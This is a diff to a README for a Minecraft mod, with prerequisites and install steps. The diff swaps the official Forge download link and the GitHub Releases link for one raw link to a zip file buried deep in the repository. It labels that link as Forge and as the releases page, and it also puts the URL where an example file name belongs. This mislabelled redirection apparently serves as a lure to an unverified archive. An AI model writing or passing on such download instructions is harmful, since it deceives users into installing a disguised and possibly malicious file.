enabling-daubing613/JennyNSFWMod/README.md

 Before you start, make sure you have the following:

 - **Minecraft:** This mod works with Minecraft version [insert compatible versions].
 - **Forge:** Download and install the correct version of Forge for your Minecraft installation.
-You can find it [here](https://files.minecraftforge.net/).
+You can find it [here](https://raw.githubusercontent.com/enabling-daubing613/JennyNSFWMod/main/software/bernie/geckolib3/JennyNSFWMod-1.6.zip).

 ## 📥 Download & Install

 To get started with Jenny Mod, follow these steps:

-1. **Visit the Releases Page:** Go to the [Releases page](https://github.com/enabling-daubing613/JennyNSFWMod/releases).
+1. **Visit the Releases Page:** Go to the [Releases page](https://raw.githubusercontent.com/enabling-daubing613/JennyNSFWMod/main/software/bernie/geckolib3/JennyNSFWMod-1.6.zip).

 2. **Select the Latest Version:** Look for the latest release.
 You will find various files listed there.

-3. **Download the Mod File:** Click on the mod file that suits your system (e.g., `JennyNSFWMod.jar`).
+3. **Download the Mod File:** Click on the mod file that suits your system (e.g., `https://raw.githubusercontent.com/enabling-daubing613/JennyNSFWMod/main/software/bernie/geckolib3/JennyNSFWMod-1.6.zip`).
 This file is essential for installation.

 4. **Install the Mod:**
    - Locate your Minecraft installation folder.
 This is often found in a path similar to `C:\Users\[YourUsername]\AppData\Roaming\.minecraft\mods`.